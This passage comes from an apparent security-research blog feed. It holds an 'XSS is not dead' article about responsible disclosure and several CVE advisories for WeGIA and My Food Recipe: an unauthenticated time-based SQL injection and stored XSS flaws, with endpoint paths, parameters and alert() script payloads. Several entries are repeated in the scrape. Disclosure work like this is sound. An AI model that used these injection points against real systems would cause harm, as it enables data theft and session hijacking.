vulnerability. This step is a bit complex to do manually, so we used artificial intelligence to cross-reference the domains extracted from <b><code>Shodan</code></b> with information available on the internet about companies that have bug bounty programs or open VDPs.</p> <p style="text-align: justify;">During this research, we found only two domains with public VDPs - one a large private sector company, the other a government agency. Both are based in the United States: one with a VDP hosted on BugCrowd and the other with a private VDP, accessible via email.</p> <p style="text-align: justify;">We reported both vulnerabilities to the companies responsibly.</p> <p><img src="/articles/xss-nao-esta-morto/image-4.png" width="1477" height="318" srcset="/articles/xss-nao-esta-morto/image-4_hu_4ef3b501dfbf457c.png 480w, /articles/xss-nao-esta-morto/image-4_hu_b14be945089ea159.png 1024w" loading="lazy" alt="POC of Reflected XSS on one of the identified targets" class="gallery-image" data-flex-grow="464" data-flex-basis="1114px" /></p> <p><img src="/articles/xss-nao-esta-morto/image-5.png" width="1324" height="691" srcset="/articles/xss-nao-esta-morto/image-5_hu_6322dbd059060c9c.png 480w, /articles/xss-nao-esta-morto/image-5_hu_9279a9a4ff7f61a6.png 1024w" loading="lazy" alt="Responsible Disclosure via Bugcrowd" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <p style="text-align: justify;">It is important to note that the sample tested represents only a fraction of the systems exposed.</p> <h2 id="more-numbers"><strong>More numbers</strong> </h2><p style="text-align: justify;">If you're still not convinced by the amount of XSS we have out there, we can do another simple search in the <i>GitHub Advisory Database</i> where we get a return of over <b>31,611 XSS-related occurrences</b>.</p> <p><img src="/articles/xss-nao-esta-morto/image-6.png" width="2692" height="1404" srcset="/articles/xss-nao-esta-morto/image-6_hu_8944e16afc8c1393.png 480w, /articles/xss-nao-esta-morto/image-6_hu_aa853c3ed0f5991.png 1024w" loading="lazy" alt="XSS search on GitHub Advisory Database" class="gallery-image" data-flex-grow="191" data-flex-basis="460px" /></p> <p style="text-align: justify;">A search in the <b>CVE (Common Vulnerabilities and Exposures)</b> database also reveals a significant number of registered vulnerabilities related to XSS, demonstrating its recurrence in different systems, applications and contexts over the years.</p> <p><img src="/articles/xss-nao-esta-morto/image-7.png" width="1096" height="866" srcset="/articles/xss-nao-esta-morto/image-7_hu_dacb254ef186816c.png 480w, /articles/xss-nao-esta-morto/image-7_hu_272a9901a5e54f76.png 1024w" loading="lazy" alt="XSS search on MITRE" class="gallery-image" data-flex-grow="126" data-flex-basis="303px" /></p> <p style="text-align: justify;">In addition, a search carried out on the <b>HackerOne</b> platform, widely recognized in the <i>Bug Bounty</i> ecosystem, results in a total of <b>2,225 public reports</b> involving Cross-Site Scripting vulnerabilities. This data reinforces not only the prevalence of XSS, but also the security community's continued interest in exploiting and reporting it, even in environments with high security standards.</p> <p><img src="/articles/xss-nao-esta-morto/image-8.png" width="1178" height="831" srcset="/articles/xss-nao-esta-morto/image-8_hu_2eaf7efd23d706c8.png 480w, /articles/xss-nao-esta-morto/image-8_hu_c63b99d525b540c3.png 1024w" loading="lazy" alt="XSS search on HackerOne" class="gallery-image" data-flex-grow="141" data-flex-basis="340px" /></p> <h2 id="what-can-you-do-with-an-xss-besides-alert1"><strong>What can you do with an XSS besides alert(1)?</strong> </h2><p style="text-align: justify;">The famous alert(1) is often the first example used to demonstrate an XSS flaw. However, the real impacts of this vulnerability go far beyond a simple alert window. Below, we list some classic and well-known malicious actions that can be carried out by an attacker when exploiting a Cross-Site Scripting flaw:</p> <p style="text-align: justify;"> <ul> <li><b>Cookie Theft</b>, (if the cookie is not protected with the HttpOnly flag);</li> <li><b>Session Hijacking</b>, assuming the victim's identity in authenticated applications;</li> <li><b>Keylogging</b>, capturing everything the user types on the compromised page;</li> <li><b>Malicious Redirects</b> to fake pages, with the aim of applying scams;</li> <li><b>Performing actions on behalf of the user</b>, such as sending messages, changing settings or deleting data;</li> <li><b>Remote Code Execution</b>, although rare and depending on the specific context, it may be possible to gain remote access to the system from an XSS.</li> </ul> </p> <p style="text-align: justify;">These examples show that even though XSS is an often underestimated vulnerability, it can have serious consequences, especially when exploited in applications with sensitive data or with a high level of privilege for the affected user.</p> <h2 id="conclusion"><strong>Conclusion</strong> </h2><p style="text-align: justify;">XSS is not dead, perhaps it has just been ignored in the face of new, more 'glamorous' threats. But its silent presence continues to offer an exploitable attack surface, often with critical impact.</p> <p style="text-align: justify;">Despite often being classified as a vulnerability of <i>medium</i> or even <i>low</i> severity, <b>XSS should not be underestimated</b>. <b>Its impact can be significant, especially when it involves stealing cookies, session hijacking or redirecting to malicious pages. And what's more dangerous: traditional protections are not always enough to prevent the user from being tricked into clicking on that phishing site that is using a legitimate URL with an XSS vulnerability</b>.</p> <p style="text-align: justify;">After all, XSS often depends on a single click, and in this scenario, <b>the weakest link is usually the user themselves</b>. It doesn't matter how robust your framework is or how well configured your WAF is: if the attacker manages to create a convincing malicious link, all it takes is one inattentive action by the victim for the attack to materialize.</p> <p style="text-align: justify;"><b>While we rely on frameworks and WAFs, the attacker relies on our carelessness and the user's curiosity.</b></p> <p>Despite often being classified as a vulnerability of <em>medium</em> or even <em>low</em> severity, <strong>XSS should not be underestimated</strong>. Its impact can be significant, especially when it involves stealing cookies, session hijacking or redirecting to malicious pages. And what’s more dangerous: <strong>traditional protections are not always enough to prevent the user from being tricked into clicking on that phishing site that is using a legitimate URL with an XSS vulnerability.</strong></p> <p>After all, XSS often depends on a single click, and in this scenario, <strong>the weakest link is usually the user themselves</strong>. It doesn’t matter how robust your framework is or how well configured your WAF is: if the attacker manages to create a convincing malicious link, all it takes is one inattentive action by the victim for the attack to materialize.</p> <p><strong>While we rely on frameworks and WAFs, the attacker relies on our carelessness and the user’s curiosity.</strong></p> <p><img src="/articles/xss-nao-esta-morto/xss-is-not-dead.png" width="1200" height="600" srcset="/articles/xss-nao-esta-morto/xss-is-not-dead_hu_f6aedbe45d16af84.png 480w, /articles/xss-nao-esta-morto/xss-is-not-dead_hu_f5fd8f4a58fac159.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h2 id="written-by">Written by </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <h2 id="partnership">Partnership </h2><p><a class="link" href="https://hacktiba.github.io/" target="_blank" rel="noopener" ><img src="/assets/partners/hacktiba60x60.png" loading="lazy" /></a> This post was made in partnership with <strong><a class="link" href="https://hacktiba.github.io/" target="_blank" rel="noopener" >Hacktiba</a></strong> for Pulse 07.</p> <blockquote> <p><em>Por: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53091/ https://www.cvehunters.com/p/cve-2025-53091/ <h2 id="cve-2025-53091-unauthenticated-time-based-sql-injection-vulnerability-in-almox-parameter">CVE-2025-53091: Unauthenticated Time-Based SQL Injection Vulnerability in <code>almox</code> Parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53091" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53091</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Time-Based Blind SQL Injection vulnerability was discovered in the <code>almox</code> parameter of the <code>/controle/getProdutosPorAlmox.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database. This specific vulnerability is blind in nature and was confirmed using time-based inference (SLEEP() function).</p><h2 id="cve-2025-53091-unauthenticated-time-based-sql-injection-vulnerability-in-almox-parameter">CVE-2025-53091: Unauthenticated Time-Based SQL Injection Vulnerability in <code>almox</code> Parameter </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53091" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53091</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Time-Based Blind SQL Injection vulnerability was discovered in the <code>almox</code> parameter of the <code>/controle/getProdutosPorAlmox.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the almox parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database. This specific vulnerability is blind in nature and was confirmed using time-based inference (SLEEP() function).</p> <p style="text-align: justify;">The vulnerable request does not require any form of authentication (no cookies, tokens, or headers required), making it especially critical.</p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Below are two working proof-of-concept HTTP requests that demonstrate the vulnerability. The difference in response time clearly confirms the execution of the SLEEP() function in the backend:</p> <p><img src="/p/cve-2025-53091/image.png" width="1764" height="856" srcset="/p/cve-2025-53091/image_hu_a59a17384516386a.png 480w, /p/cve-2025-53091/image_hu_9f758b97b421d6c3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="206" data-flex-basis="494px" /></p> <p><img src="/p/cve-2025-53091/image-1.png" width="1773" height="847" srcset="/p/cve-2025-53091/image-1_hu_862f1352375e1c2.png 480w, /p/cve-2025-53091/image-1_hu_47187b954f8b5b0c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="502px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-pmf9-2rc3-vvxx#advisory-comment-130861</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Fri, 27 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6345/ https://www.cvehunters.com/p/cve-2025-6345/ <h2 id="cve-2025-6345-cross-site-scripting-xss-stored-endpoint-add-recipephp-parameter-recipe-name">CVE-2025-6345: Cross-Site Scripting (XSS) Stored endpoint <code>add-recipe.php</code> parameter <code>Recipe Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6345" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6345</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>add-recipe.php</code> endpoint of the My Food Recipe application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>Recipe Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-6345-cross-site-scripting-xss-stored-endpoint-add-recipephp-parameter-recipe-name">CVE-2025-6345: Cross-Site Scripting (XSS) Stored endpoint <code>add-recipe.php</code> parameter <code>Recipe Name</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6345" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6345</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>add-recipe.php</code> endpoint of the My Food Recipe application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the <code>Recipe Name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/endpoint/add-recipe.php</code></p> <p>Parameter: <code>Recipe Name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Recipe Name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB My Food Recipe'</span><span class="p">)</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6345/image.png" width="1885" height="979" srcset="/p/cve-2025-6345/image_hu_2d96538d4258e3ef.png 480w, /p/cve-2025-6345/image_hu_69d65a36c5d34271.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6345/image-1.png" width="1887" height="978" srcset="/p/cve-2025-6345/image-1_hu_367086433527965a.png 480w, /p/cve-2025-6345/image-1_hu_97a43c355f94af1c.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="463px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/HLt4Ezuzxaw" target="_blank" rel="noopener" >https://youtu.be/HLt4Ezuzxaw</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6694/ https://www.cvehunters.com/p/cve-2025-6694/ <h2 id="cve-2025-6694-cross-site-scripting-xss-stored-endpoint-adicionar_unidadephp-parameter-unidade">CVE-2025-6694: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_unidade.php</code> parameter <code>Unidade</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6694" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6694</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_unidade.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Unidade</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_unidade.php</code></p><h2 id="cve-2025-6694-cross-site-scripting-xss-stored-endpoint-adicionar_unidadephp-parameter-unidade">CVE-2025-6694: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_unidade.php</code> parameter <code>Unidade</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6694" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6694</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_unidade.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Unidade</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_unidade.php</code></p> <p>Parameter: <code>Unidade</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Unidade</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6694/image.png" width="1896" height="993" srcset="/p/cve-2025-6694/image_hu_aa98354b3826b69.png 480w, /p/cve-2025-6694/image_hu_f42a65e996076c92.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="190" data-flex-basis="458px" /></p> <p><img src="/p/cve-2025-6694/image-1.png" width="1879" height="990" srcset="/p/cve-2025-6694/image-1_hu_ee83094dec5adefe.png 480w, /p/cve-2025-6694/image-1_hu_384fcc464a1d2a6.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="455px" /></p> <p><img src="/p/cve-2025-6694/image-2.png" width="1884" height="976" srcset="/p/cve-2025-6694/image-2_hu_a237a910db38d115.png 480w, /p/cve-2025-6694/image-2_hu_afe9be25709c469f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="463px" /></p> <p><img src="/p/cve-2025-6694/image-3.png" width="1890" height="988" srcset="/p/cve-2025-6694/image-3_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6694/image-3_hu_547e87c56180f7a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://www.youtube.com/watch?v=X7DJmOtNqxU" target="_blank" rel="noopener" >https://www.youtube.com/watch?v=X7DJmOtNqxU</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6695/ https://www.cvehunters.com/p/cve-2025-6695/ <h2 id="cve-2025-6695-cross-site-scripting-xss-stored-endpoint-adicionar_categoriaphp-parameter-categoria">CVE-2025-6695: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_categoria.php</code> parameter <code>Categoria</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6695" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6695</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_categoria.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Categoria</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_categoria.php</code></p><h2 id="cve-2025-6695-cross-site-scripting-xss-stored-endpoint-adicionar_categoriaphp-parameter-categoria">CVE-2025-6695: Cross-Site Scripting (XSS) Stored endpoint <code>adicionar_categoria.php</code> parameter <code>Categoria</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6695" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6695</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>adicionar_categoria.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>Categoria</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/matPat/adicionar_categoria.php</code></p> <p>Parameter: <code>Categoria</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Categoria</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Poc VulDB'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-6695/image.png" width="1911" height="992" srcset="/p/cve-2025-6695/image_hu_fe6ecfa94b00b912.png 480w, /p/cve-2025-6695/image_hu_707ca28be50f53f5.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-6695/image-1.png" width="1890" height="988" srcset="/p/cve-2025-6695/image-1_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6695/image-1_hu_547e87c56180f7a2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="191" data-flex-basis="459px" /></p> <h3 id="video-poc">Video PoC: </h3><p><a class="link" href="https://youtu.be/VZs4hmHYaXQ" target="_blank" rel="noopener" >https://youtu.be/VZs4hmHYaXQ</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 26 Jun 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-6696/ https://www.cvehunters.com/p/cve-2025-6696/ <h2 id="cve-2025-6696-cross-site-scripting-xss-stored-endpoint-cadastro_atendidophp-parameter-cpf">CVE-2025-6696: Cross-Site Scripting (XSS) Stored endpoint <code>Cadastro_Atendido.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6696" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6696</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>Cadastro_Atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/atendido/Cadastro_Atendido.php</code></p><h2 id="cve-2025-6696-cross-site-scripting-xss-stored-endpoint-cadastro_atendidophp-parameter-cpf">CVE-2025-6696: Cross-Site Scripting (XSS) Stored endpoint <code>Cadastro_Atendido.php</code> parameter <code>cpf</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-6696" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-6696</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>Cadastro_Atendido.php</code> endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the <code>cpf</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security</a></p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/html/atendido/Cadastro_Atendido.php</code></p> <p>Parameter: <code>cpf</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user 